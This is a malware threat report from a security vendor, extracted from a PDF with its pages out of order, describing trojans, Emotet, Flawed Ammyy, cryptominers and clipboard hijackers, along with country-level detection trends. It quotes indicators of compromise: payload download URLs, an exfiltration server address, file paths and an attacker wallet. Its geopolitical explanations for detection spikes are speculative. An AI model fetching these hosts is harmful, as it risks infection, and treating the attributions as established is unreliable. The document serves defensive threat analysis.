523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 6 of 73
TrojWareWin32Injector uses process injection as the main technique to take malicious actions Its mostly used to bypass security products
TrojWareJSDownloader consists of scripts that download and execute malware from the Internet Itrsquos usually spread via a phishing email
Such diversity of malicious activity of trojans and their special ability to hide have always made them one of the hardest malware to fight But in Q2-2018 they become even more sophisticated and dangerous Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community
First among the trends is an explosive mixture of trojans and phishing emails Earlier phishing emails mostly contained a link to a malicious website to lure victims to supply their credentials But today phishing emails have become a potent means of delivery for trojans and other malware These trojans steal credentials and private information by ferreting out infected machines in search of valuable data and then send it to cybercriminalsrsquo servers
The accompanying graph of the most popular malware spread via email Note that 18 of 20 are trojans
Distribution of Phishing Families of Malware
Global Threat Report Q2 2018 Edition
Page 7 of 73
21 The Most Widespread Trojan The most proliferated trojan TrojWareWin32Injector is designed to steal credentials from infected computers It was spread via fake email imitating a message from a shipping and trading company As seen in the screenshot the malware attached is carefully disguised with a plausible name and icon to look like a real scanned document
If a user takes the bait and runs the file it copies itself to appdata as D5E2DEE36C7Aexe then launches itself from that location and starts to gather credentials present in the system
It collects credentials and private data from known browsers email clients FTP clients WebDav SCP clients Then it sends all the collected data to the attackersrsquo server httpcallbedmlpackfarefrephp
The phishing email
Global Threat Report Q2 2018 Edition
Page 8 of 73
22 PowerShell-based attack with Emotet Another alarming trend is related to malware itself rather than its delivery method Often cybercriminals use malware based not on Windows native exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer This type of attack is much harder to detect with antivirus tools
Emotet is one of the most aggressive trojans currently acting in cyberspace Spread by various infection vectors and backed by a huge network of compromised hosts it heavily affects many individuals and companies
The following attack started with the email that imitated a message from IRS about ldquoTax Account Transcriptrdquo Notice the message is written in a cheerful manner to inspire user trust
The phishing email
Global Threat Report Q2 2018 Edition
Page 9 of 73
The attached file is an Office document containing a VBScript As the settings of the newly installed Microsoft Office do not allow execution of such scripts by default the attackers added a special option to convince the victims to turn on VBScript execution
The special option to convince the victims to turn on VBScript execution
Global Threat Report Q2 2018 Edition
Page 10 of 73
The purpose of the VBScript is to launch PowerShell
Global Threat Report Q2 2018 Edition
Page 11 of 73
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of the writing only thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb)
The binary moves itself to CWindowsSysWOW64lanesviewerexe and creates a service ldquolanesviewerrdquo to ensure persistence
The malware creates ldquolanesviewerrdquo service to ensure persistence
Global Threat Report Q2 2018 Edition
Page 12 of 73
And after that Emotet begins it real mission ndash stealing private data from the compromised system which it then it sends to the cybercriminals Command amp Control server
The next example is even more cunning because it infects computers with popular legitimate Microsoft software
23 Flawed Ammyy RAT attack based on legitimate software Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks What is most impressive is that it is based on a legitimate software called Ammyy Admin Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company It provides an easy way to establish a reliable remote desktop connection connecting remote computers within seconds without additional installation or configuration work
The dark side of this tool is that its features ideally suit the purposes of cybercriminal Unsurprisingly perpetrators tried to adopt it for their malicious activity Cybercriminals repeatedly compromised the Ammyyy Group website and replaced original Ammyy Admin software with a bundle containing malware Thus every user who downloaded Ammyy Admin became covertly infected Ammy Group cleaned up the compromised website but the attackers infected it again and this vicious сycle continued endlessly
Global Threat Report Q2 2018 Edition
Page 13 of 73
As you can see on the diagram Ammy Admin was used in spreading many types of nefarious malware
The newest version of malicious modification of Ammyy Admin is called Flawed Ammyy Itrsquos a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 It got its name from the leaked source code of the third Ammyy Admin version Flawed Ammyy RAT let the attackers use functions such as Remote Desktop control File System Manager proxy support and audio chat Cybercriminals take total control of the infected host and can run amok ndash steal credentials and documents remove or add files run applications install other malware etc
The way Flaw Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users What is especially worth noticing is the fact that these tricks are also based on using a legitimate software ndash Microsoft this time
Global Threat Report Q2 2018 Edition
Page 14 of 73
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment as in the following screenshot
The phishing email
IQY files are intended for making an Internet query from MS Excel so an IQY contains a URL and other related parameters It can download files and run them directly into MS Excel
The infected IQY included a malicious URL so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell
Malware runs PowerShell
Global Threat Report Q2 2018 Edition
Page 15 of 73
Thus in this case machines face extremely dangerous and potent malware created and delivered via legitimate software This feature makes it much harder for antivirus software to detect an attack
24 The growth of Flawed Ammyy attacks for Q2
The growth of Flawed Ammyy attacks for Q2
25 Ammyy Admin dissemination around the world for Q2 As illustrated trojans became an 800-pound gorilla in the malware market in Q2 This trend will inevitably entail a change of attack vectors to covert theft and manipulating users This trend is a real gift for cybercriminals and a terrible nightmare for users
Trojans let attackers gain time As malware acts covertly the cybercriminals have more than enough time to use stolen data to their advantage In many cases attacks can only be discovered too late after money is withdrawn from a bank account or confidential data published etc Merging trojans as payloads and phishing emails as means of delivery observed during Q2 will result in a huge surge in such attacks and victims And using legitimate tools like PowerShell for running malware will amplify the number of victims even more because such attacks are much harder to detect with antiviruses
To fight these attacks cybersecurity departments need to rearrange their approach to security measures per the new trends above Combining the best detection malware tools and methods of protecting data built on defense-in-depth principles provide the most promising solution
43188
46382
48881
40000
41000
42000
43000
44000
45000
46000
47000
48000
49000
50000
Apr May Jun
Global Threat Report Q2 2018 Edition
Page 16 of 73
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers For that reason many users did not regard them as particularly dangerous at least not all cryptominers would steal information or destroy data like other malware merely sucking up CPU resources Moreover they typically do not employ strong obfuscation and can be easily discovered and deleted
But Q2 events clearly showed that the situation has radically changed
New samples of cryptominers detected by Comodo malware analysts exhibit much harmful abilities than those required for merely mining cryptocurrency These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals They are learning to hide and fight against antimalware tools They can camouflage themselves kill competing cryptominers and even crash user systems if met with an attempt to delete the malware
31 BadShell attacks enterprises Fileless malware is next-generation malware especially compared with traditional infection via exe files File-based malware resides on the hard drive making it easier to detect But fileless malware is different As its name suggests this type of malware represents malicious code injected into legitimate OS processes It need not be installed on a victim machine but functions only in memory making much harder for antiviruses to detect
Usually such malware is spread via malicious ad banners Clicking on a banner redirects a user to an infected website where the malware covertly installs itself into the victimrsquos computer As many antiviruses tools cannot detect it users remain unaware of being infected Not surprisingly its use by cybercriminals is on the increase
Last quarter Comodo Threat Research Labs analysts faced a scenario of just such an attack A company with several thousands of endpoints was compromised by fileless malware When their legacy security software failed to protect them the company looked to Comodo Threat Research Labs for assistance
Global Threat Report Q2 2018 Edition
Page 17 of 73
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes PowerShell to execute commands Task Scheduler to ensure persistence and Registry to hold the malicious binary code In the screenshots below you see how exactly the malware dubbed BadShell works
If we decode the PowerShell arguments we see the malicious code in the registry The code is injected into an existing running process by the PowerShell script
BadShell at work
Global Threat Report Q2 2018 Edition
Page 18 of 73
The malicious code in the registry
Global Threat Report Q2 2018 Edition
Page 19 of 73
This emergency clearly demonstrates how dangerous cryptominer activity can be Just imagine it the entire compute capacity of the enterprises computers was engaged in mining cryptocurrency depriving employees of the ability to perform their jobs Comodo analysts took over the situation and cleaned the infection from all involved computers but of course the financial losses of the company were irreversible
Invulnerability to an antivirus and persistence in the system are the most important attributes for a cryptominer because the more it runs within the infected system the more it profits the attackers That is why cybercriminals give special attention to the cryptominers ability to elude antivirus software
Below is another cunning technique that turns an infected machine into a slave of the attacker
32 WinstarNssmMiner a system killer Like other cryptominers The WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals But it has a special feature ndash it can root into a system so deeply that it becomes unremovable Attempting to kill it will kill the target system totally
The secret of WinstarNssmMinerrsquos persistence lies in its method of infecting a victimrsquos computer It consists of two processes injected into two system svchostexe processes The first performs the main task ndash mining cryptocurrency The other runs in the background looking for antivirus products and disables them
The malicious code disguised as svhostexe
Especially impressive is that both infected svchostexe processed possess the system attribute ldquoCriticalProcess meaning that terminating any of them will crash the system leaving the user with a blue screen
WinstarNssmMiner spreading around the world
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
